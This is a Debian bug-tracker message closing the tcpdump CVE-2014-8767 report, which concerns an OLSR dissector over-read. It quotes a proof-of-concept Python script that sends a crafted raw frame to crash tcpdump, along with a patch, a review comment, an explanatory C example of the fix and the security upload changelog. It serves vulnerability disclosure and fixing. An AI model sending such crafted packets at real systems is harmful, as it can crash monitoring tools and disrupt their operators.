Your message dated Mon, 08 Dec 2014 18:33:55 +0000
with message-id <e1xy387-0001jb...@franck.debian.org>
and subject line Bug#770434: fixed in tcpdump 4.1.1-1+deb6u1
has caused the Debian Bug report #770434,
regarding tcpdump: CVE-2014-8767: tcpdump denial of service in verbose mode using malformed OLSR payload
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)


-- 
770434: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=770434
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
--- Begin Message ---
Package: tcpdump
Version: 4.6.2
tags: Security

Use the following script to generate the packet:

#!/usr/bin/env python
# Sends one crafted Ethernet frame on the loopback interface.
# Linux only; needs root (CAP_NET_RAW) to open an AF_PACKET/SOCK_RAW socket.
from socket import socket, AF_PACKET, SOCK_RAW

s = socket(AF_PACKET, SOCK_RAW)
s.bind(("lo", 0))

# Ethernet header, IPv4 header, UDP header (source port 0x02ba = 698, the OLSR
# port, which is what makes tcpdump hand the payload to the OLSR dissector)
# and the malformed OLSR payload. Bytes literal so it sends unchanged on
# Python 2 and Python 3.
olsr_frame = b"\x00\x1b\xc6\x51\x35\x97\x00\x24\x8c\x7a\xff\x6f\x08\x00\x45\x15\x00\x3d\xf3\x7f\x40\x00\x4d\x11\x30\xc6\x0a\x01\x01\x68\x0a\x02\x02\x02\x02\xba\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x20\x00\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x20\x01\x00\x00\x00"

s.send(olsr_frame)
s.close()

# Start tcpdump in verbose mode on the loopback interface first, in another
# terminal:
#   sudo tcpdump -i lo -s 0 -n -v

This causes a segfault in tcpdump. This bug was reported as CVE-2014-8767.
The proposed patch is in the attached file. The main idea is checking the length of available
data before printing it on screen.

The credit belongs to
Steffen Bauch
Twitter: @steffenbauch
http://steffenbauch.de

The original report on BugTraq is:
http://seclists.org/bugtraq/2014/Nov/90

--
CongNT

--- tcpdump-tcpdump-4.6/print-olsr.c	2014-10-23 14:07:12.000000000 +0700
+++ tcpdump-4.6.2/print-olsr.c	2014-11-21 14:56:18.205542679 +0700
@@ -234,6 +234,13 @@
     ND_PRINT((ndo, "\n\t      neighbor\n\t\t"));
     neighbor = 1;
 
+    u_int caplength;
+
+    /* Checking length of available data before print */
+    caplength = (ndo->ndo_snapend >= msg_data) ? ndo->ndo_snapend - msg_data : 0;
+    if (hello_len > caplength)
+        hello_len = caplength;
+
     while (hello_len >= sizeof(struct in_addr)) {
 
         /* print 4 neighbors per line */
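Review bot: the `u_int caplength;` declaration sits after the statements `ND_PRINT(...)` and `neighbor = 1;` in the same block, which strict C89 builds (and builds that warn with -Wdeclaration-after-statement) reject; move it up to the function's other declarations. The clamp itself stops the over-read, but it does so silently: when `hello_len > caplength` the loop just prints fewer neighbors and the user gets no hint that the capture was shorter than the message claimed, which is exactly the case `-s 0` users care about. Prefer checking each `sizeof(struct in_addr)` read inside the `while` against the snapshot end and bailing out to the dissector's truncation path (the ND_TCHECK-style checks tcpdump uses in other printers), so the output carries the usual `[|olsr]` marker instead of a plausible-looking but incomplete list. Minor: `ndo->ndo_snapend - msg_data` is a ptrdiff_t being stored in a `u_int`; an explicit cast makes the intent clear.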

--- End Message ---
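To make the over-read and the fix concrete, here is an added example written for this page; it is not tcpdump's code and not the reporter's patch, and it stands in for tcpdump's olsr_print_neighbor() with a hypothetical caller that supplies `msg_data`, `snapend` and the packet-supplied `hello_len`. It models the pre-fix loop by computing how far past the captured data it would read (without actually reading), and it applies the clamp from the patch but also returns a truncation flag so the caller can append tcpdump's `[|olsr]` marker instead of silently printing a shorter list. The neighbor bytes and the claimed length are constructed sample input.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Result of walking an OLSR HELLO neighbor list. Hypothetical stand-in for
 * tcpdump's olsr_print_neighbor(); this is not the project's code. */
struct neigh_result {
    unsigned printed;   /* IPv4 neighbor addresses actually read and printed */
    int truncated;      /* 1 if hello_len claimed more bytes than were captured */
};

/* Pre-fix behaviour, modelled without touching memory: the loop trusts the
 * packet-supplied hello_len and would read this many bytes past snapend (the
 * end of the captured data). A non-zero result is the out-of-bounds read that
 * crashed tcpdump in verbose mode. */
static size_t overrun_if_unchecked(const uint8_t *msg_data,
                                   const uint8_t *snapend,
                                   unsigned hello_len)
{
    size_t avail  = (snapend >= msg_data) ? (size_t)(snapend - msg_data) : 0;
    size_t wanted = (size_t)(hello_len / 4) * 4;   /* whole in_addr entries */
    return wanted > avail ? wanted - avail : 0;
}

/* Fixed behaviour: the clamp from the patch (hello_len limited to the bytes
 * between msg_data and snapend), plus a truncation flag so the caller can
 * append the "[|olsr]" marker rather than silently print a shorter list.
 * Neighbors are written to 'out' as dotted quads, 4 bytes per neighbor. */
static struct neigh_result print_neighbors_checked(const uint8_t *msg_data,
                                                   const uint8_t *snapend,
                                                   unsigned hello_len,
                                                   char *out, size_t outlen)
{
    struct neigh_result r = { 0, 0 };
    size_t caplength = (snapend >= msg_data) ? (size_t)(snapend - msg_data) : 0;
    size_t pos = 0;

    if (hello_len > caplength) {          /* claim exceeds captured data */
        r.truncated = 1;
        hello_len = (unsigned)caplength;
    }
    out[0] = '\0';
    while (hello_len >= 4) {              /* sizeof(struct in_addr) */
        int n = snprintf(out + pos, outlen - pos, "%s%u.%u.%u.%u",
                         pos ? ", " : "",
                         (unsigned)msg_data[0], (unsigned)msg_data[1],
                         (unsigned)msg_data[2], (unsigned)msg_data[3]);
        if (n < 0 || (size_t)n >= outlen - pos)
            break;                        /* output buffer full */
        pos += (size_t)n;
        msg_data  += 4;
        hello_len -= 4;
        r.printed++;
    }
    if (r.truncated && pos < outlen)
        snprintf(out + pos, outlen - pos, " [|olsr]");
    return r;
}

/* Constructed sample: the capture holds only two neighbor addresses while the
 * message claims 0x220 bytes of them (a value chosen for this example). */
static const uint8_t sample_neighbors[8] = { 10, 0, 0, 1, 10, 0, 0, 2 };
#define SAMPLE_CLAIMED_LEN 0x220u

int main(void)
{
    char out[128];
    const uint8_t *end = sample_neighbors + sizeof sample_neighbors;
    struct neigh_result r;

    printf("unchecked loop would read %zu bytes past snapend\n",
           overrun_if_unchecked(sample_neighbors, end, SAMPLE_CLAIMED_LEN));
    r = print_neighbors_checked(sample_neighbors, end, SAMPLE_CLAIMED_LEN,
                                out, sizeof out);
    printf("checked: %s (printed=%u truncated=%d)\n",
           out, r.printed, r.truncated);
    return 0;
}
```

The `snapend >= msg_data` guard matters: if an earlier dissector already advanced past the captured data, the subtraction would otherwise go negative and the clamp would do nothing.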
--- Begin Message ---
Source: tcpdump
Source-Version: 4.1.1-1+deb6u1

We believe that the bug you reported is fixed in the latest version of
tcpdump, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 770...@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Thorsten Alteholz <deb...@alteholz.de> (supplier of updated tcpdump package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmas...@ftp-master.debian.org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Format: 1.8
Date: Mon, 08 Dec 2014 18:17:14 +0100
Source: tcpdump
Binary: tcpdump
Architecture: source i386
Version: 4.1.1-1+deb6u1
Distribution: squeeze-lts
Urgency: low
Maintainer: Romain Francoise <rfranco...@debian.org>
Changed-By: Thorsten Alteholz <deb...@alteholz.de>
Description: 
 tcpdump    - A powerful tool for network monitoring and data acquisition
Closes: 770424 770434
Changes: 
 tcpdump (4.1.1-1+deb6u1) squeeze-lts; urgency=low
 .
   * Non-maintainer upload by the Squeeze LTS Team.
   * Add patches extracted from the upstream tcpdump_4.3 branch fixing
     three security issues:
     + CVE-2014-8767: missing bounds checks in the OLSR dissector
       (closes: #770434).
     + CVE-2014-8769: missing bounds checks in the AODV dissector
       (closes: #770424).
     + CVE-2014-9140: missing bounds checks in the PPP dissector
Checksums-Sha1: 
 30fbfb11e5f2fc75b5552ef857b18f57386c5911 2006 tcpdump_4.1.1-1+deb6u1.dsc
 8f356cbc781192ecb527623d68db90e06aa9d4b9 1587392 tcpdump_4.1.1.orig.tar.gz
 0e1f60287770c218c8ba4f9dbde1bd19c3c28a78 17106 tcpdump_4.1.1-1+deb6u1.debian.tar.gz
 c563dfbc0b3804751dbd07ea59cc3e002062d024 377242 tcpdump_4.1.1-1+deb6u1_i386.deb
Checksums-Sha256: 
 e6b815a7c65a4b13981e79caa8136ec1fb7d77aa455d35d6238c5cdc6d32e93e 2006 tcpdump_4.1.1-1+deb6u1.dsc
 e6cd4bbd61ec7adbb61ba8352c4b4734f67b8caaa845d88cb826bc0b9f1e7f0a 1587392 tcpdump_4.1.1.orig.tar.gz
 3b7b0104f1bbb9b874ece0830764b4b629fc65c3c47b03657733b0046f47928f 17106 tcpdump_4.1.1-1+deb6u1.debian.tar.gz
 186f6ce0d68aa25382ec656c8a644195df7ad0b2ac6ac3fca0791ca6ac66946b 377242 tcpdump_4.1.1-1+deb6u1_i386.deb
Files: 
 60c38fabe1f4252db2aa17859389aded 2006 net optional tcpdump_4.1.1-1+deb6u1.dsc
 d0dd58bbd6cd36795e05c6f1f74420b0 1587392 net optional tcpdump_4.1.1.orig.tar.gz
 f85bacca750d3133766f9f56c90b874a 17106 net optional tcpdump_4.1.1-1+deb6u1.debian.tar.gz
 330f9dccabd9cb37cf8d2a3c22d19ba7 377242 net optional tcpdump_4.1.1-1+deb6u1_i386.deb

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1

iQJ8BAEBCgBmBQJUhevrXxSAAAAAAC4AKGlzc3Vlci1mcHJAbm90YXRpb25zLm9w
ZW5wZ3AuZmlmdGhob3JzZW1hbi5uZXQ2MjAxRkJGRkRCQkRFMDc4MjJFQUJCOTY5
NkZDQUMwRDM4N0I1ODQ3AAoJEJb8rA04e1hHJ9MQAIX4/3GanNHhDeuOUJPdQwov
ev9X1byyQg8k+qqBxU3zq6WIfqu6T96Z4uEmrlpMcDGrdsKbGauZN/KoO0THfy20
/b/GzL8InoTIGsqa+RQbEIU+zIJsmtsF+OHzWhnBOMc5tiuIQxSocdOtjpg6HeTU
dXntSeb0IZWw3HgTOtsJo1eDZhydacMfGFOk5RxEsyMEBzhoZArqS8+4wMEzX6w1
1dLDx/9tNBOk8GcirZGyQ7q9qv7dEpgatqajxS8GCHZgD0i0j5Ur9j6NL/fhhHfo
bKC8j5ONNUKZuDElDYSptJn42MLCMwKIvLhJC5PeUNl958Ii6TmIprsphLIyMTbk
YKSOhQHafJFUgFro9M1koy7qhhnyq5nbhUupv+yhI4+Vedt13fciSAaDsuEUWTlE
/EcttReM+DtsoInDHLryB9+aKdBI25Y3LHo7U2X2e81pKPe1InQu+crbxnCAt1c/
6j/uWYNxrb5JnCzF9RtSqEgEO3YMpG2zpXDPKsnAQcFYYCXQB+PIoaCWX1xvK/t9
imDC1bw0lYN9DG01txow/znaHv1LYIe8eb5ShuSPwHoimclEVfLHYV47o55RUw6S
jWrJOAlp4crrAhEly3bof3gBfruO0iJdBEouNrn28x2SUoZQKezLf+gLyd1GRH8z
ym21gmVruJNNhDgnwDg8
=rE9Q
-----END PGP SIGNATURE-----

--- End Message ---
